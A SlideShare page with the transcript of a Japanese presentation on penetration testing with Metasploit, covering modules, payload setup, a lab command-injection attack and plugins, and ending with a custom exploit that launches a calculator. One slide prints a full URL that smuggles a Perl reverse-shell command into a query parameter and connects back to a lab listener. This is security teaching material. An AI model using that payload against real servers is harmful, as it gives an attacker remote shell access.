Download SlideShare for Android. 15 million presentations at your fingertips  Get the app
×
  • Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
 
« »
   

Metasploitでペネトレーションテスト

on

  • 187 views

 

Statistics

Views

Total Views
187
Views on SlideShare
179
Embed Views
8

Actions

Likes
1
Downloads
5
Comments
0

1 Embed 8

https://twitter.com 8

Accessibility

Categories

Upload Details

Uploaded via SlideShare as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
    More…

    Metasploitでペネトレーションテスト Metasploitでペネトレーションテスト Presentation Transcript

    • Metasploitでペネトレーションテスト @super_a1ice
    • 目次 Metasploit Framework基本 Webアプリケーションの脆弱性を突いてみる Metasploit プラグイン Exploitを作って電卓を起動してみる
    • Metasploit Frameworkとは? 脆弱性を発見し、それを実証するためのフレームワー ク ペネトレーションテストを効率化するためのツール システムに重大な被害を与える可能性があるため、使 用には注意が必要
    • Metasploit Framework基本
    • Msfconsoleコマンド
    • モジュールの指定
    • シェルコードを設定
    • オプションの確認
    • ファイル名を設定
    • IPアドレスを設定
    • ポート番号を設定
    • Exploitの作成
    • C&Cサーバの用意
    • オプションの確認
    • シェルコードの設定
    • オプションの確認
    • IPアドレスを設定
    • ポート番号を設定
    • C&Cサーバの作成
    • Let's exploit !
    • Readme.txt
    • 攻撃が成功すると
    • システム情報の取得
    • lsコマンド
    • Webアプリケーションの脆弱性を 突いてみる
    • 準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意
    • 準備 OSコマンドインジェクションの脆弱性があるWebアプリ ケーションを用意 後ろに任意のコマンドを挿入可能
    • ※実験の際の注意 必ず仮想環境を用いること 閉じたネットワーク内で実行する スナップショットを用いて被害前の状態へ戻せるように する
    • ペイロードを選択
    • IPアドレスの設定
    • バックドアの生成
    • C&Cサーバの用意
    • Let's exploit !! http://192.168.56.3/?ip=1.1.1.1;perl%20-MIO%20- e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socke t::INET%28PeerAddr,%22192.168.56.2:4444%22%29;STDI N-%3Efdopen%28$c,r%29;$~- %3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
    • 攻撃が成功すると
    • Metasploit プラグイン
    • プラグインを使用して機能を追加する
    • 便利なプラグイン Openvas MetasploitからOpenVASを利用するためのプラグイン Nessus MetasploitからNessusを利用するためのプラグイン Xssf MetasploitでXSSを行うためのプラグイン http://xssf.googlecode.com/svn/trunk auto_exploit データベースに登録された脆弱性に対してexploitする https://github.com/darkoperator/Metasploit-Plugins Postauto 確立しているセッションにコマンドを送信する https://github.com/darkoperator/Metasploit-Plugins
    • Exploitを作って電卓を 起動してみる
    • まずはExploitの用意 Exploit-dbから探す http://www.exploit-db.com/ 自作する
    • 今回は自作プログラムを用意
    • 大きなテキストファイルを読み込まると
    • ROP自動化
    • シェルコード選択
    • 変数の確認
    • 実行したいコマンドの設定
    • pythonのコードを生成
    • シェルコードをコピペしてから Let's exploit !!!
    • 電卓が起動!!
    • ありがとうございました